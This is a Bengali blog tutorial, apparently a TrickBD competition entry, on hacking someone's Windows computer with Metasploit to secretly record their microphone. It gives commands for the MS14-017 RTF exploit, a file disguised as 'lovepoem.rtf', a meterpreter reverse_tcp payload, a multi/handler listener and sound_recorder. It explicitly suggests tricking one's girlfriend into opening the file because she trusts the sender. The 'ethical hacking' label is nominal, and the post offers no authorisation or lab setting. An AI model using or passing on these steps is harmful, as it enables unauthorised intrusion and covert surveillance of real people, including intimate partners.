#TrickBDCompetition
ওয়েলকাম ব্যাক আমি সজিব ট্রিকবিডি থেকে আছি আপনাদের সাথে। এথিকাল হ্যাকিং এর জন্য কালি লিনাক্স আমার একটি প্রিয় অপারেটিং সিস্টেম যার সাথে আমার অনেক দিনেরই পরিচয়.যেই অপারেটিং সিস্টেম নিয়ে আমার অনেক পোস্ট রয়েছে, রয়েছে কম্পিউটার হ্যাকিং ওয়াইফাই হ্যাকিং.ফেইসবুক হ্যাকিং আর্টিকেল।
এথিকাল হ্যাকিং শব্দের সাথে আমরা অনেকেই পরিচিত. কারো অনুমতি ছাড়া তথ্য চুরি করাই হ্যাকিং.
আজকে আমি আপনাদের সাথে যেই টপিকটি নিয়ে আলোচনা করব সেটি হচ্ছে “কি-ভাবে মেটাস্পলয়িট টুল দিয়ে যে করারো কম্পিউটার হ্যাক করে ভয়েস রেকর্ড শুনবেন এবং আরোও অনেক কিছু।
প্রয়োজনীয় যে জিনিস লাগবে:
- কালি লিনাক্স
- Metasploit টুল ইন্সটল দেওয়া থাকতে হবে।
দেখে আসুন:কালি লিনাক্স ইন্সটল দিয়ে যে ৫ টি কাজ করতে ভুলবেন না
প্রথমে কালি লিনাক্সে প্রবেশ করুন:
কম্পিউটার হ্যাক করার জন্য প্রথম যে কাজটি করতে হবে অবস্যই আপনাকে কালি লিনাক্স চালু করতে হবে। প্রথমে আমাদের টার্গেট কম্পিউটার এর সাথে কমপ্রমাইজ করতে হবে। মেটাস্পলয়িট চালু করুন
ভিক্টিমকে ফাদে ফেলার আইডিয়া:
আগেই বলে নেই আপনি যদি আপনার ভিক্টিমের পিসি নিজের কন্ট্রোলে আনতে চান তাহলে ভিক্টিমকে মাস্ট কুনু একটি ফাদে ফেলতে হবে.এই দুনিয়াতে অটোমেটিক কুনু হ্যাকিং নেই যে আপনি আপনার ভিক্টিমের কম্পিউটার এর নাম লিখে দিলেন আর হ্যাক হয়ে গেলো। ফেইসবুক এর ইউজার নেইম মেরে দিলেন আর আইডির পাস চলে আসলো. মস্তিষ্ক কে কাজে লাগাতে হয়। আপনি যতক্ষণনা আপনার টার্গেট পিসিতে মেলিসিয়াস স্ক্রিপ্ট পাঠাবেননা বা আপনার ভিক্টিমকে যতক্ষণ না ফাদে ফেলতে পারবেন না তাকে হ্যাক করা আপনার পক্ষে সম্ভব না।
আপনি আপনার ভিক্টিমকে ফাদে ফেলতে চাইলে কুনু ডকুমেন্ট সেন্ড করতে পারেন। ক্লিক অন দা লিনক এরকম কুনু এমবেডেড কুডে স্ক্রিপ্ট পাঠাতে পারেন আবার ছবি. গান.ভিডিও এর মাধ্যমে পারেন।
আমি যেভাবে আমার ভিক্টিমকে ফাদে ফেলবো সেটি হচ্ছে Microstoft office এর একটি ডকুমেন্ট বানিয়ে।
এক্সপ্লয়িট খুজা:
যদি আপনি উইন্ডোজ ৭ কে Exploit করতে চান( অনেক ৭ এর Exploit ৮ এও কাজ করে)
তার জন্য আমাদের উইন্ডোজ ৭ এর এক্সপ্লয়িট বের করতে হবে।
অনেক আগে মাইক্রোসফট একটি নিউজে বলে যে হ্যাকাররা দুর্বলতা পেয়েছে Microstoft Word এ এবং তাদের Office Web এ।
এখানে আপনারা দেখতে পাচ্ছেন এখানে এক্সপ্লয়িট এর নাম দেওয়া MS14-017 তার মানে বুঝাই জাচ্ছে এটি মেটাস্পলয়িট টুল দিয়ে হ্যাক করা পসিবল।
exploit/windows/fileformat/ms14_017_rtf
এখন আমাদের কাজ হচ্ছে এই Exploit টিকে রান করা মেটাস্পলয়িটে লউড করাবো নিচের কমান্ড দিয়ে:
use exploit/windows/fileformat/ms14_017_rtf
যখন এটি প্রবেশ করাবেন তারপর INFO লিখে ইন্টার করুন তাহলে এই Exploit এর সকল ইনফরমেশন চলে আসবে
এখন show options লিখে এন্টার প্রেস করুন
এখানে আপনি দেখতে পাচ্ছেন FILENAME দেওয়ার জন্য (মনে রাখবেন এটি শুধুমাত্র অফিস ১০ এ কাজ করবে?
ফাইল নেইম এডিট করা:
এক্সাম্পল হিসেবে আমি আপনাদেরকে দেখাচ্ছি ধরুন আপনি আপনার Girlfriend এর পিসি হ্যাক করবেন এখন আপনি ওকে একটি ভালোবাসার কবিতা পাঠাবেন জার নাম “Love Poem” এবার চলুন এক্সপ্লয়িট এর নাম দেওয়া যাক FILE NAME এর জাগায় “lovepoem.rtf.”করে দেই। এর জন্য নিচের কমান্ড দিয়ে এন্টার করুন।
set FILENAME lovepoem.rtf
Payload সেট করা:
এর জন্য আমাদের
> set PAYLOAD windows/meterpreter/reverse_tcp
এই কমান্ড দিয়ে এন্টার করতে হবে।
পরবর্তীতে যে কাজ করতে হবে LHOST সেট করা এটি আপনার সিস্টেম এর আইপি। এটি আপনাকে বলে দিবে কখন আপনার ভিক্টিম আপনার ফাইল দারা এক্সেকিউট হয়েছে।
ফাইনালি জাস্ট টাইপ করুন “exploit.” এটি সিম্পলি একটি Word ফাইল বানাবে জার নাম হচ্ছে “lovepoem” এটিকে meterpreter সিস্টেমে বসাতে হবে জাতে করে আমরা কানেক্ট হতে পারি।
কানেকশন এর জন্য মাল্টি হেন্ডেলার:
এর পরের স্টেপ হচ্ছে আমাদের একটি মাল্টি হেন্ডেলার সিস্টেম ওপেন করতে হবে জাতে করে কানেকশন রিসিভ করে আমাদের কম্পিউটারে ফিরত আসে।
এই 3 টি কমান্ড টাইপ করুন এবং নিজের আইপি দিয়ে এলহস্ট সেট করুন।
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
কবিতাটি আপনার ভিক্টিমকে সেন্ড করুন:
এখন আমরা আমাদের মেলিসিয়াস ফাইল্টি বানিয়ে ফেলেছি এখন সুধু আপনি আপনার GIRLFRIEND কে এটি পাঠিয়ে দিন। ইমেইল এটাচমেন্ট করে পাঠিয়ে দিতে পারেন এবং বলুন যে পড়ার জন্য অবস্যই পড়বে যেহেতু আপনাকে ট্রাস্ট করে।
সিস্টেমকে হাতে আনা:
যখনি সে ফাইলটি ওপেন করবে সাথে সাথে একটি একটি মেটারপেটার সেশন চালু হয়ে যাবে। এখন আসছে আসল মজা
মাইক্রোফোন দিয়ে রেকর্ড করুন:
এখন আমাদের কাজ হচ্ছে তার কম্পিউটারের মাইক্রোফোন চালু করে সকল কিছু শুনা অথবা রেকর্ড করা।
জাস্ট টাইপ করুন run sound_recorder - l /root
এটি আপনার ভিক্টিম এর পিসি থেকে রেকর্ড করা শুরু করে দিবে এবং /root directory তে গেলে আপনি আপনার রেকর্ড গুলি পেয়ে যাবেন।এরকম মেটাস্পলয়িট এবং এথিকাল হ্যাকিং এর জন্য সাথেই থাকুন
আসা করি সবাই বুঝতে পেরেছেন সবাই কে বিদায় জানাচ্ছি। Stay Tune আমার সাইটে ভিসিট করতে ভুলবেন না বাংলাপেন.কমে
আমাদের সাইটে চলছে ওয়ার্ডপ্রেস এর থিম ডেভলপিং। আপনারা যারা প্রোগ্রামিং বা ওয়েব ডেভলপিং এর ফ্রি কোর্স করতে চান কিছু শিখে নিজের মোবাইল দিয়ে ওয়েব ডেভলপিং করে হাত খরচ আনতে চান। তারা এখান থেকে ওয়ার্ডপ্রেস থিম ডেভলপিং এর সিরিজ টি দেখতে পারেন এখানে
আর যদি এরকম আরও সিরিজ বা ফ্রি কোর্স চান তবে আমাদের সাইটে রেজিষ্ট্রেশন করতে ভুলবেন্না।
আমার আরোও কিছু পোস্ট
5 thoughts on "কিভাবে মেটাস্পলয়িট টুল দিয়ে যে কারোর কম্পিউটার হ্যাক করে ভয়েস রেকর্ড শুনবেন"